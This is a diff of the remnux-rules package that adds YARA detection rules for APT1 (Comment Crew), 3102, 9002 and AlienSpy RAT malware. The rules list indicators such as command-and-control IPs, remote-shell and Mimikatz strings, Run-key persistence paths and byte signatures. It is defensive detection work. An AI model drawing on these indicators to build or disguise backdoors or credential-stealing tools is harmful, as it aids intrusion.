+                $s6 = "wait" wide ascii
+                $s7 = "active" wide ascii
+                $s8 = "hello" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule SEASALT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii
+                $s2 = "upfileok" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "upfileer" wide ascii
+                $s5 = "fxftest" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule STARSYPOUND_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "*(SY)# cmd" wide ascii
+                $s2 = "send = %d" wide ascii
+                $s3 = "cmd.exe" wide ascii
+                $s4 = "*(SY)#" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule SWORD_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii
+                $s2 = "sleep:" wide ascii
+                $s3 = "down:" wide ascii
+                $s4 = "*========== Bye Bye ! ==========*" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule thequickbrow_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "thequickbrownfxjmpsvalzydg" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule TABMSGSQL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "letusgohtppmmv2.0.0.1" wide ascii
+                $s2 = "Mozilla/4.0 (compatible; )" wide ascii
+                $s3 = "filestoc" wide ascii
+                $s4 = "filectos" wide ascii
+                $s5 = "reshell" wide ascii
+
+        condition:
+                all of them
+}
+
+rule CCREWBACK1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "postvalue" wide ascii
+    $b = "postdata" wide ascii
+    $c = "postfile" wide ascii
+    $d = "hostname" wide ascii
+    $e = "clientkey" wide ascii
+    $f = "start Cmd Failure!" wide ascii
+    $g = "sleep:" wide ascii
+    $h = "downloadcopy:" wide ascii
+    $i = "download:" wide ascii
+    $j = "geturl:" wide ascii
+    $k = "1.234.1.68" wide ascii
+
+  condition:
+    4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k
+}
+
+rule TrojanCookies_CCREW
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "sleep:" wide ascii
+    $b = "content=" wide ascii
+    $c = "reqpath=" wide ascii
+    $d = "savepath=" wide ascii
+    $e = "command=" wide ascii
+
+
+  condition:
+    4 of ($a,$b,$c,$d,$e)
+}
+
+rule GEN_CCREW1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "W!r@o#n$g" wide ascii
+    $b = "KerNel32.dll" wide ascii
+
+  condition:
+    any of them
+}
+
+rule Elise
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "SetElise.pdb" wide ascii
+
+  condition:
+    $a
+}
+
+rule EclipseSunCloudRAT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "Eclipse_A" wide ascii
+    $b = "\\PJTS\\" wide ascii
+    $c = "Eclipse_Client_B.pdb" wide ascii
+    $d = "XiaoME" wide ascii
+    $e = "SunCloud-Code" wide ascii
+    $f = "/uc_server/data/forum.asp" wide ascii
+
+  condition:
+    any of them
+}
+
+rule MoonProject
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "Serverfile is smaller than Clientfile" wide ascii
+    $b = "\\M tools\\" wide ascii
+    $c = "MoonDLL" wide ascii
+        $d = "\\M tools\\" wide ascii
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader2
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "3gZFQOBtY3sifNOl" wide ascii
+        $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii
+        $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewMiniasp
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "MiniAsp.pdb" wide ascii
+    $b = "device_t=" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewSSLBack2
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = {39 82 49 42 BE 1F 3A}
+
+  condition:
+    any of them
+}
+
+rule ccrewSSLBack3
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "SLYHKAAY" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewSSLBack1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "!@#%$^#@!" wide ascii
+    $b = "64.91.80.6" wide ascii
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader3
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "ejlcmbv" wide ascii
+        $b = "bhxjuisv" wide ascii
+        $c = "yqzgrh" wide ascii
+        $d = "uqusofrp" wide ascii
+        $e = "Ljpltmivvdcbb" wide ascii
+        $f = "frfogjviirr" wide ascii
+        $g = "ximhttoskop" wide ascii
+  condition:
+    4 of them
+}
+
+
+rule ccrewQAZ
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "!QAZ@WSX" wide ascii
+
+  condition:
+    $a
+}
+
+rule metaxcd
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "<meta xcd=" wide ascii
+
+  condition:
+    $a
+}
+
+rule MiniASP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+strings:
+    $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
+    $PDB = "MiniAsp.pdb" nocase wide ascii
+
+condition:
+    any of them
+}
+
+rule DownloaderPossibleCCrew
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "%s?%.6u" wide ascii
+    $b = "szFileUrl=%s" wide ascii
+    $c = "status=%u" wide ascii
+    $d = "down file success" wide ascii
+        $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii
+
+  condition:
+    all of them
+}
+
+rule APT1_MAPIGET
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $s1 = "%s\\Attachment.dat" wide ascii
+        $s2 = "MyOutlook" wide ascii
+        $s3 = "mail.txt" wide ascii
+        $s4 = "Recv Time:" wide ascii
+        $s5 = "Subject:" wide ascii
+
+    condition:
+        all of them
+}
+
+rule APT1_LIGHTBOLT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "bits.exe" wide ascii
+        $str2 = "PDFBROW" wide ascii
+        $str3 = "Browser.exe" wide ascii
+        $str4 = "Protect!" wide ascii
+    condition:
+        2 of them
+}
+
+rule APT1_GETMAIL
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $stra1 = "pls give the FULL path" wide ascii
+        $stra2 = "mapi32.dll" wide ascii
+        $stra3 = "doCompress" wide ascii
+
+        $strb1 = "getmail.dll" wide ascii
+        $strb2 = "doCompress" wide ascii
+        $strb3 = "love" wide ascii
+    condition:
+        all of ($stra*) or all of ($strb*)
+}
+
+rule APT1_GDOCUPLOAD
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "name=\"GALX\"" wide ascii
+        $str2 = "User-Agent: Shockwave Flash" wide ascii
+        $str3 = "add cookie failed..." wide ascii
+        $str4 = ",speed=%f" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_Y21K
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "Y29ubmVjdA" wide ascii // connect
+        $2 = "c2xlZXA" wide ascii // sleep
+        $3 = "cXVpdA" wide ascii // quit
+        $4 = "Y21k" wide ascii // cmd
+        $5 = "dW5zdXBwb3J0" wide ascii // unsupport
+    condition:
+        4 of them
+}
+
+rule APT1_WEBC2_YAHOO
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $http1 = "HTTP/1.0" wide ascii
+        $http2 = "Content-Type:" wide ascii
+        $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_UGX
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
+        $exe = "DefWatch.exe" wide ascii
+        $html = "index1.html" wide ascii
+        $cmd1 = "!@#tiuq#@!" wide ascii
+        $cmd2 = "!@#dmc#@!" wide ascii
+        $cmd3 = "!@#troppusnu#@!" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_TOCK
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "InprocServer32" wide ascii
+        $2 = "HKEY_PERFORMANCE_DATA" wide ascii
+        $3 = "<!---[<if IE 5>]id=" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_TABLE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $msg1 = "Fail To Execute The Command" wide ascii
+        $msg2 = "Execute The Command Successfully" wide ascii
+        /*
+	$gif1 = /\w+\.gif/
+	*/
+        $gif2 = "GIF89" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_RAVE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "iniet.exe" wide ascii
+        $2 = "cmd.exe" wide ascii
+        $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii
+        $4 = "Device File System" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_QBP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "2010QBP" wide ascii
+        $2 = "adobe_sl.exe" wide ascii
+        $3 = "URLDownloadToCacheFile" wide ascii
+        $4 = "dnsapi.dll" wide ascii
+        $5 = "urlmon.dll" wide ascii
+    condition:
+        4 of them
+}
+
+rule APT1_WEBC2_HEAD
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "Ready!" wide ascii
+        $2 = "connect ok" wide ascii
+        $3 = "WinHTTP 1.0" wide ascii
+        $4 = "<head>" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_GREENCAT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "reader_sl.exe" wide ascii
+        $2 = "MS80547.bat" wide ascii
+        $3 = "ADR32" wide ascii
+        $4 = "ControlService failed!" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_DIV
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii
+        $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii
+        $3 = "Hello from MFC!" wide ascii
+        $4 = "Microsoft Internet Explorer" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_CSON
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $httpa1 = "/Default.aspx?INDEX=" wide ascii
+        $httpa2 = "/Default.aspx?ID=" wide ascii
+        $httpb1 = "Win32" wide ascii
+        $httpb2 = "Accept: text*/*" wide ascii
+        $exe1 = "xcmd.exe" wide ascii
+        $exe2 = "Google.exe" wide ascii
+    condition:
+        1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
+}
+
+rule APT1_WEBC2_CLOVER
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $msg1 = "BUILD ERROR!" wide ascii
+        $msg2 = "SUCCESS!" wide ascii
+        $msg3 = "wild scan" wide ascii
+        $msg4 = "Code too clever" wide ascii
+        $msg5 = "insufficient lookahead" wide ascii
+        $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii
+        $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii
+    condition:
+        2 of ($msg*) and 1 of ($ua*)
+}
+
+rule APT1_WEBC2_BOLID
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $vm = "VMProtect" wide ascii
+        $http = "http://[c2_location]/[page].html" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_ADSPACE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "<!---HEADER ADSPACE style=" wide ascii
+        $2 = "ERSVC.DLL" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_AUSOV
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "ntshrui.dll" wide ascii
+        $2 = "%SystemRoot%\\System32\\" wide ascii
+        $3 = "<!--DOCHTML" wide ascii
+        $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii
+        $5 = "Ausov" wide ascii
+    condition:
+        4 of them
+}
+
+rule APT1_WARP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $err1 = "exception..." wide ascii
+        $err2 = "failed..." wide ascii
+        $err3 = "opened..." wide ascii
+        $exe1 = "cmd.exe" wide ascii
+        $exe2 = "ISUN32.EXE" wide ascii
+    condition:
+        2 of ($err*) and all of ($exe*)
+}
+
+rule APT1_TARSIP_ECLIPSE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "\\pipe\\ssnp" wide ascii
+        $2 = "toobu.ini" wide ascii
+        $3 = "Serverfile is not bigger than Clientfile" wide ascii
+        $4 = "URL download success" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_TARSIP_MOON
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii
+        $s2 = "URL download success!" wide ascii
+        $s3 = "Kugoosoft" wide ascii
+        $msg1 = "Modify file failed!! So strange!" wide ascii
+        $msg2 = "Create cmd process failed!" wide ascii
+        $msg3 = "The command has not been implemented!" wide ascii
+        $msg4 = "Runas success!" wide ascii
+        $onec1 = "onec.php" wide ascii
+        $onec2 = "/bin/onec" wide ascii
+    condition:
+        1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
+}
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule APT1_payloads
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $pay1 = "rusinfo.exe" wide ascii
+        $pay2 = "cmd.exe" wide ascii
+        $pay3 = "AdobeUpdater.exe" wide ascii
+        $pay4 = "buildout.exe" wide ascii
+        $pay5 = "DefWatch.exe" wide ascii
+        $pay6 = "d.exe" wide ascii
+        $pay7 = "em.exe" wide ascii
+        $pay8 = "IMSCMig.exe" wide ascii
+        $pay9 = "localfile.exe" wide ascii
+        $pay10 = "md.exe" wide ascii
+        $pay11 = "mdm.exe" wide ascii
+        $pay12 = "mimikatz.exe" wide ascii
+        $pay13 = "msdev.exe" wide ascii
+        $pay14 = "ntoskrnl.exe" wide ascii
+        $pay15 = "p.exe" wide ascii
+        $pay16 = "otepad.exe" wide ascii
+        $pay17 = "reg.exe" wide ascii
+        $pay18 = "regsvr.exe" wide ascii
+        $pay19 = "runinfo.exe" wide ascii
+        $pay20 = "AdobeUpdate.exe" wide ascii
+        $pay21 = "inetinfo.exe" wide ascii
+        $pay22 = "svehost.exe" wide ascii
+        $pay23 = "update.exe" wide ascii
+        $pay24 = "NTLMHash.exe" wide ascii
+        $pay25 = "wpnpinst.exe" wide ascii
+        $pay26 = "WSDbg.exe" wide ascii
+        $pay27 = "xcmd.exe" wide ascii
+        $pay28 = "adobeup.exe" wide ascii
+        $pay29 = "0830.bin" wide ascii
+        $pay30 = "1001.bin" wide ascii
+        $pay31 = "a.bin" wide ascii
+        $pay32 = "ISUN32.EXE" wide ascii
+        $pay33 = "AcroRD32.EXE" wide ascii
+        $pay34 = "INETINFO.EXE" wide ascii
+    condition:
+        1 of them
+}
+*/
+
+rule APT1_RARSilent_EXE_PDF
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $winrar1 = "WINRAR.SFX" wide ascii
+        /*
+        $winrar2 = ";The comment below contains SFX script commands" wide ascii
+        $winrar3 = "Silent=1" wide ascii
+	*/
+
+        /*$str1 = /Setup=[\s\w\"]+\.(exe|pdf|doc)/
+	*/
+        $str2 = "Steup=\"" wide ascii
+    condition:
+        all of ($winrar*) and 1 of ($str*)
+}
+
+rule APT1_aspnetreport
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $url = "aspnet_client/report.asp" wide ascii
+        $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii
+        $pay1 = "rusinfo.exe" wide ascii
+        $pay2 = "cmd.exe" wide ascii
+        $pay3 = "AdobeUpdater.exe" wide ascii
+        $pay4 = "buildout.exe" wide ascii
+        $pay5 = "DefWatch.exe" wide ascii
+        $pay6 = "d.exe" wide ascii
+        $pay7 = "em.exe" wide ascii
+        $pay8 = "IMSCMig.exe" wide ascii
+        $pay9 = "localfile.exe" wide ascii
+        $pay10 = "md.exe" wide ascii
+        $pay11 = "mdm.exe" wide ascii
+        $pay12 = "mimikatz.exe" wide ascii
+        $pay13 = "msdev.exe" wide ascii
+        $pay14 = "ntoskrnl.exe" wide ascii
+        $pay15 = "p.exe" wide ascii
+        $pay16 = "otepad.exe" wide ascii
+        $pay17 = "reg.exe" wide ascii
+        $pay18 = "regsvr.exe" wide ascii
+        $pay19 = "runinfo.exe" wide ascii
+        $pay20 = "AdobeUpdate.exe" wide ascii
+        $pay21 = "inetinfo.exe" wide ascii
+        $pay22 = "svehost.exe" wide ascii
+        $pay23 = "update.exe" wide ascii
+        $pay24 = "NTLMHash.exe" wide ascii
+        $pay25 = "wpnpinst.exe" wide ascii
+        $pay26 = "WSDbg.exe" wide ascii
+        $pay27 = "xcmd.exe" wide ascii
+        $pay28 = "adobeup.exe" wide ascii
+        $pay29 = "0830.bin" wide ascii
+        $pay30 = "1001.bin" wide ascii
+        $pay31 = "a.bin" wide ascii
+        $pay32 = "ISUN32.EXE" wide ascii
+        $pay33 = "AcroRD32.EXE" wide ascii
+        $pay34 = "INETINFO.EXE" wide ascii
+    condition:
+        $url and $param and 1 of ($pay*)
+}
+
+rule APT1_Revird_svc
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $dll1 = "nwwwks.dll" wide ascii
+        $dll2 = "rdisk.dll" wide ascii
+        $dll3 = "skeys.dll" wide ascii
+        $dll4 = "SvcHost.DLL.log" wide ascii
+        $svc1 = "InstallService" wide ascii
+        $svc2 = "RundllInstallA" wide ascii
+        $svc3 = "RundllUninstallA" wide ascii
+        $svc4 = "ServiceMain" wide ascii
+        $svc5 = "UninstallService" wide ascii
+    condition:
+        1 of ($dll*) and 2 of ($svc*)
+}
+
+rule APT1_dbg_mess
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $dbg1 = "Down file ok!" wide ascii
+        $dbg2 = "Send file ok!" wide ascii
+        $dbg3 = "Command Error!" wide ascii
+        $dbg4 = "Pls choose target first!" wide ascii
+        $dbg5 = "Alert!" wide ascii
+        $dbg6 = "Pls press enter to make sure!" wide ascii
+        $dbg7 = "Are you sure to " wide ascii
+        $pay1 = "rusinfo.exe" wide ascii
+        $pay2 = "cmd.exe" wide ascii
+        $pay3 = "AdobeUpdater.exe" wide ascii
+        $pay4 = "buildout.exe" wide ascii
+        $pay5 = "DefWatch.exe" wide ascii
+        $pay6 = "d.exe" wide ascii
+        $pay7 = "em.exe" wide ascii
+        $pay8 = "IMSCMig.exe" wide ascii
+        $pay9 = "localfile.exe" wide ascii
+        $pay10 = "md.exe" wide ascii
+        $pay11 = "mdm.exe" wide ascii
+        $pay12 = "mimikatz.exe" wide ascii
+        $pay13 = "msdev.exe" wide ascii
+        $pay14 = "ntoskrnl.exe" wide ascii
+        $pay15 = "p.exe" wide ascii
+        $pay16 = "otepad.exe" wide ascii
+        $pay17 = "reg.exe" wide ascii
+        $pay18 = "regsvr.exe" wide ascii
+        $pay19 = "runinfo.exe" wide ascii
+        $pay20 = "AdobeUpdate.exe" wide ascii
+        $pay21 = "inetinfo.exe" wide ascii
+        $pay22 = "svehost.exe" wide ascii
+        $pay23 = "update.exe" wide ascii
+        $pay24 = "NTLMHash.exe" wide ascii
+        $pay25 = "wpnpinst.exe" wide ascii
+        $pay26 = "WSDbg.exe" wide ascii
+        $pay27 = "xcmd.exe" wide ascii
+        $pay28 = "adobeup.exe" wide ascii
+        $pay29 = "0830.bin" wide ascii
+        $pay30 = "1001.bin" wide ascii
+        $pay31 = "a.bin" wide ascii
+        $pay32 = "ISUN32.EXE" wide ascii
+        $pay33 = "AcroRD32.EXE" wide ascii
+        $pay34 = "INETINFO.EXE" wide ascii        
+    condition:
+        4 of ($dbg*) and 1 of ($pay*)
+}
+
+rule APT1_known_malicious_RARSilent
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "Analysis And Outlook.doc\"" wide ascii
+        $str2 = "North Korean launch.pdf\"" wide ascii
+        $str3 = "Dollar General.doc\"" wide ascii
+        $str4 = "Dow Corning Corp.pdf\"" wide ascii
+    condition:
+        1 of them and APT1_RARSilent_EXE_PDF
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/APT3102.yar remnux-rules-0.0.4/yara/malware/APT3102.yar
--- remnux-rules-0.0.3/yara/malware/APT3102.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT3102.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,36 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT3102Code : APT3102 Family 
+{
+    meta:
+        description = "3102 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 }
+  
+    condition:
+        any of them
+}
+
+rule APT3102Strings : APT3102 Family
+{
+    meta:
+        description = "3102 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "rundll32_exec.dll\x00Update"
+        // this is in the encrypted code - shares with 9002 variant
+        //$ = "POST http://%ls:%d/%x HTTP/1.1"
+        
+    condition:
+       any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT9002.yar remnux-rules-0.0.4/yara/malware/APT9002.yar
--- remnux-rules-0.0.3/yara/malware/APT9002.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT9002.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,71 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT9002Code : APT9002 Family 
+{
+    meta:
+        description = "9002 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        // start code block
+        $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 }
+        // decryption from other variant with multiple start threads
+        $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC }
+  
+    condition:
+        any of them
+}
+
+rule APT9002Strings : APT9002 Family
+{
+    meta:
+        description = "9002 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "POST http://%ls:%d/%x HTTP/1.1"
+        $ = "%%TEMP%%\\%s_p.ax" wide ascii
+        $ = "%TEMP%\\uid.ax" wide ascii
+        $ = "%%TEMP%%\\%s.ax" wide ascii
+        // also triggers on surtr $ = "mydll.dll\x00DoWork"
+        $ = "sysinfo\x00sysbin01"
+        $ = "\\FlashUpdate.exe"
+        
+    condition:
+       any of them
+}
+
+rule APT9002 : Family
+{
+    meta:
+        description = "9002"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        APT9002Code or APT9002Strings
+}
+
+rule FE_APT_9002 : RAT
+{
+    meta:
+        Author      = "FireEye Labs"
+        Date        = "2013/11/10"
+        Description = "Strings inside"
+        Reference   = "Useful link"
+
+    strings:
+        $mz = { 4d 5a }
+        $a = "rat_UnInstall" wide ascii
+
+    condition:
+        ($mz at 0) and $a
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/APT_alienspy_RAT.yar remnux-rules-0.0.4/yara/malware/APT_alienspy_RAT.yar
--- remnux-rules-0.0.3/yara/malware/APT_alienspy_RAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_alienspy_RAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+rule crime_win_rat_AlienSpy
+{
+meta:
+	description = "Alien Spy Remote Access Trojan"
+	author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
+	reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
+	reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
+	date = "2015-04-04"
+	filetype = "Java"
+	hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
+	hash_2 = "818afea3040a887f191ee9d0579ac6ed"
+	hash_3 = "973de705f2f01e82c00db92eaa27912c"
+	hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
+	hash_5 = "071e12454731161d47a12a8c4b3adfea"
+	hash_6 = "a7d50760d49faff3656903c1130fd20b"
+	hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
+	hash_8 = "3698a3630f80a632c0c7c12e929184fb"
+	hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
+
+   strings:
+		
+        $sa_1 = "META-INF/MANIFEST.MF"
+        $sa_2 = "Main.classPK"
+        $sa_3 = "plugins/Server.classPK"
+        $sa_4 = "IDPK"
+		
+        $sb_1 = "config.iniPK"
+        $sb_2 = "password.iniPK"
+        $sb_3 = "plugins/Server.classPK"
+        $sb_4 = "LoadStub.classPK"
+        $sb_5 = "LoadStubDecrypted.classPK"
+        $sb_7 = "LoadPassword.classPK"
+        $sb_8 = "DecryptStub.classPK"
+        $sb_9 = "ClassLoaders.classPK"
+		
+        $sc_1 = "config.xml"
+        $sc_2 = "options"
+        $sc_3 = "plugins"
+        $sc_4 = "util"
+        $sc_5 = "util/OSHelper"
+        $sc_6 = "Start.class"
+        $sc_7 = "AlienSpy"
+        $sc_8 = "PK"
+	
+  condition:
+    
+	uint16(0) == 0x4B50 and filesize < 800KB and ( (all of ($sa_*)) or (all of ($sb_*)) or (all of ($sc_*)) )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_APT17.yar remnux-rules-0.0.4/yara/malware/APT_APT17.yar
--- remnux-rules-0.0.3/yara/malware/APT_APT17.yar	1970-01-01 00:00:00.000000000 +0000
